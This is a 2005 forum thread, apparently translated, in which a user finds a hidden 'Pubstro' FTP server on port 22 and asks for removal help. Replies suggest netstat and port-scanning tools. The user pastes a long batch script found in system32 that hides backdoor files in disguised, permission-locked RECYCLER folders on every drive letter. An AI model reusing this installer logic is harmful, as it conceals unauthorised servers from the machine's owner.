franksun, posted 14 February 2005: Hi. I thought there was a suspicious amount of traffic on my line, and then I found out that I was listening on port 22... so I connected to the port and it turned out to be an FTP server!:
220-.[34m_________________________________________________________
220-.[43m::::::::::::::::::::::::::::::::::: Pubstro - Loud and Proud::::::::::: :::::::::::::::::::::
220-.[34m|»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
220-.[34m| You are Connecting From: 127.0.0.1
220-.[34m| Time/Date Logged in: 14:35:40 @ Monday 14 February, 2005
220-.[34m| Server Uptime: 0 d, 0 h, 32 m
220-.[34m| Amount of Logins Since Server Started: 0
220-.[34m| Amount of Logins in the last 24 hours: 1
220-.[34m| Users connected now: 1
220-.[34m|_________________________________________________________
220-.[43m::::::::::::::::::::::::::::::::::: Pubstro - Loud and Proud::::::::::: :::::::::::::::::::::
220-.[34m|»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
220-.[34m| Total Kb downloaded: 0
220-.[34m| Total Kb uploaded: 0
220-.[34m| Amount of Files downloaded: 0
220-.[34m| Amount of Files uploaded: 0
220-.[34m| Average Speed: 0.000
220-.[34m| Current Speed: 0.000
220-.[34m|_________________________________________________________
220-.[43m::::::::::::::::::::::::::::::::::: Pubstro - Loud and Proud::::::::::: :::::::::::::::::::::
220-.[34m»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
220
I have tried to stop the process, but I can't find it; I'm fairly sure the process is hiding behind a standard one... I have also run antivirus with the latest updates and it found two backdoors. I removed them, but the program is still running in the background. What on earth can I do to fix this without formatting?
Arcus, posted 14 February 2005: I don't know if it helps you any further, but it's interesting reading anyway: http://www.mynetwatchman.com/kb/security/A...s/WinForensics/ http://www.dslreports.com/forum/remark,9735376 Let us know how it goes, and how you solved it.
franksun (thread author), posted 14 February 2005: Unfortunately I have tried that, and it doesn't find the program that is listening on the port...
Legion, posted 14 February 2005: Use Port Explorer and see which process does what and which ports, if any, are being used. http://www.diamondcs.com.au/portexplorer/
franksun (thread author), posted 14 February 2005: I have done that too. I have tried to kill the process that shows up in "ps", and I'm told that it doesn't exist, but it is there!
skille, posted 14 February 2005: You don't find any unknown service running either? Start > Run > services.msc. See if you can stop something there.. -Trond
franksun (thread author), posted 14 February 2005: No, I can't find anything.
Legion, posted 14 February 2005: What measures have you taken? List them. Were they run in safe mode? Have you run TDS-3? http://tds.diamondcs.com.au/index.php?page=home You will have to block port 22/21 for the time being.
*Magnus*, posted 14 February 2005: "so I connected to the port and it turned out to be an FTP server" OT: how did you do that? I have looked around a bit for how to do this, but didn't find anything...
Terrasque, posted 15 February 2005: Start -> Run -> cmd -> netstat /boan. Find the one that is listening on port 22.
Løve, posted 15 February 2005: Um... port 22 is FTP, isn't it? If you are online, it could be that you are seeing the files of an FTP server you are browsing...
TCi, posted 15 February 2005: FTP operates on port 21 by default.
franksun (thread author), posted 15 February 2005: "Start -> Run -> cmd -> netstat /boan. Find the one that is listening on port 22." Neither the PID nor the process name is shown.
franksun (thread author), posted 15 February 2005: Hi, I found this file in system32:
move carun.ocx "%systemroot%\system32\carun.ocx"
move TskMan.exe "%systemroot%\system32\TskMan.exe"
move chkdrv.vxd "%systemroot%\system32\chkdrv.vxd"
move carun.dll "%systemroot%\system32\carun.dll"
:diskc
if not exist "c:\" (goto diskd)
if not exist "c:\RECYCLER" mkdir "c:\RECYCLER" | attrib "c:\RECYCLER" +s +h
if exist "c:\RECYCLER" mkdir "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
move logon.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logonoop.txt"
move logoff.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logoffoop.txt"
move change.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\changeoop.txt"
echo y|caclsENG "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=C:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskd
if not exist "d:\" (goto diske)
if not exist "d:\RECYCLER" mkdir "d:\RECYCLER" | attrib "d:\RECYCLER" +s +h
if exist "d:\RECYCLER" mkdir "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
if not exist "c:\RECYCLER" move logon.txt "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logonoop.txt"
if not exist "c:\RECYCLER" move logoff.txt "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logoffoop.txt"
if not exist "c:\RECYCLER" move change.txt "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\changeoop.txt"
echo y|caclsENG "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=D:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diske
if not exist "e:\" (goto diskf)
if not exist "e:\RECYCLER" mkdir "e:\RECYCLER" | attrib "e:\RECYCLER" +s +h
if exist "e:\RECYCLER" mkdir "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp"
echo [.ShellClassInfo]>e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" move logon.txt "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logonoop.txt"
if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" move logoff.txt "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logoffoop.txt"
if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" move change.txt "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\changeoop.txt"
echo y|caclsENG "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=E:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskf
if not exist "f:\" (goto diskg)
if not exist "f:\RECYCLER" mkdir "f:\RECYCLER" | attrib "f:\RECYCLER" +s +h
if exist "f:\RECYCLER" mkdir "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" if not exist "e:\RECYCLER" move logon.txt "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logonoop.txt"
if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" if not exist "e:\RECYCLER" move logoff.txt "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logoffoop.txt"
if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" if not exist "e:\RECYCLER" move change.txt "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\changeoop.txt"
echo y|caclsENG "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=F:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskg
if not exist "g:\" (goto diskh)
if not exist "g:\RECYCLER" mkdir "g:\RECYCLER" | attrib "g:\RECYCLER" +s +h
if exist "g:\RECYCLER" mkdir "g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=G:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskh
if not exist "h:\" (goto diski)
if not exist "h:\RECYCLER" mkdir "h:\RECYCLER" | attrib "h:\RECYCLER" +s +h
if exist "h:\RECYCLER" mkdir "h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=H:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diski
if not exist "i:\" (goto diskj)
if not exist "i:\RECYCLER" mkdir "i:\RECYCLER" | attrib "i:\RECYCLER" +s +h
if exist "i:\RECYCLER" mkdir "i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=I:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskj
if not exist "j:\" (goto diskk)
if not exist "j:\RECYCLER" mkdir "j:\RECYCLER" | attrib "j:\RECYCLER" +s +h
if exist "j:\RECYCLER" mkdir "j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=J:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskk
if not exist "k:\" (goto diskl)
if not exist "k:\RECYCLER" mkdir "k:\RECYCLER" | attrib "k:\RECYCLER" +s +h
if exist "k:\RECYCLER" mkdir "k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=K:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskl
if not exist "l:\" (goto diskm)
if not exist "l:\RECYCLER" mkdir "l:\RECYCLER" | attrib "l:\RECYCLER" +s +h
if exist "l:\RECYCLER" mkdir "l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=L:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskm
if not exist "m:\" (goto diskn)
if not exist "m:\RECYCLER" mkdir "m:\RECYCLER" | attrib "m:\RECYCLER" +s +h
if exist "m:\RECYCLER" mkdir "m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=M:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskn
if not exist "n:\" (goto disko)
if not exist "n:\RECYCLER" mkdir "n:\RECYCLER" | attrib "n:\RECYCLER" +s +h
if exist "n:\RECYCLER" mkdir "n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=N:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:disko
if not exist "o:\" (goto diskp)
if not exist "o:\RECYCLER" mkdir "o:\RECYCLER" | attrib "o:\RECYCLER" +s +h
if exist "o:\RECYCLER" mkdir "o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=O:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskp
if not exist "p:\" (goto diskq)
if not exist "p:\RECYCLER" mkdir "p:\RECYCLER" | attrib "p:\RECYCLER" +s +h
if exist "p:\RECYCLER" mkdir "p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=P:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskq
if not exist "q:\" (goto diskr)
if not exist "q:\RECYCLER" mkdir "q:\RECYCLER" | attrib "q:\RECYCLER" +s +h
if exist "q:\RECYCLER" mkdir "q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=Q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskr
if not exist "r:\" (goto disks)
if not exist "r:\RECYCLER" mkdir "r:\RECYCLER" | attrib "r:\RECYCLER" +s +h
if exist "r:\RECYCLER" mkdir "r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=R:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:disks
if not exist "s:\" (goto diskt)
if not exist "s:\RECYCLER" mkdir "s:\RECYCLER" | attrib "s:\RECYCLER" +s +h
if exist "s:\RECYCLER" mkdir "s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=S:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskt
if not exist "t:\" (goto disku)
if not exist "t:\RECYCLER" mkdir "t:\RECYCLER" | attrib "t:\RECYCLER" +s +h
if exist "t:\RECYCLER" mkdir "t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=T:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:disku
if not exist "u:\" (goto diskv)
if not exist "u:\RECYCLER" mkdir "u:\RECYCLER" | attrib "u:\RECYCLER" +s +h
if exist "u:\RECYCLER" mkdir "u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=U:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskv
if not exist "v:\" (goto diskw)
if not exist "v:\RECYCLER" mkdir "v:\RECYCLER" | attrib "v:\RECYCLER" +s +h
if exist "v:\RECYCLER" mkdir "v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=V:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskw
if not exist "w:\" (goto diskx)
if not exist "w:\RECYCLER" mkdir "w:\RECYCLER" | attrib "w:\RECYCLER" +s +h
if exist "w:\RECYCLER" mkdir "w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=W:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:diskx
if not exist "x:\" (goto disky)
if not exist "x:\RECYCLER" mkdir "x:\RECYCLER" | attrib "x:\RECYCLER" +s +h
if exist "x:\RECYCLER" mkdir "x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
echo y|caclsENG "x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f
echo checkpath=X:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"
:disky
if not exist "y:\" (goto diskz)
if not exist "y:\RECYCLER" mkdir "y:\RECYCLER" | attrib "y:\RECYCLER" +s +h
if exist "y:\RECYCLER" mkdir "y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"
echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini
attrib "y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s
echo y|caclsENG "y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R
